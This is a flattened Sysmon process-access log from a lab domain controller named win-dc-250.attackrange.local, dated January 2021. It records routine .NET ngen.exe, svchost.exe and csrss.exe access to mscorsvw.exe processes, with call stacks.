13:21:45.414{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-CA01-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.289{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-C901-000000009A01}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.273{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4569-6000-C901-000000009A01}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.273{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-C901-000000009A01}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-C801-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.211{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4569-6000-C801-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.211{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-C801-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.164{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-C701-000000009A01}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.164{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4569-6000-C701-000000009A01}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.164{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-C701-000000009A01}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-C601-000000009A01}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.101{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4569-6000-C601-000000009A01}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.101{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-C601-000000009A01}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.054{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-C501-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.054{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4569-6000-C501-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.054{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-C501-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.007{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4568-6000-C401-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.945{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-D401-000000009A01}4840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.945{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456A-6000-D401-000000009A01}4840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.945{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-D401-000000009A01}4840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.648{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-D301-000000009A01}4572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.632{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456A-6000-D301-000000009A01}4572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.632{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-D301-000000009A01}4572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 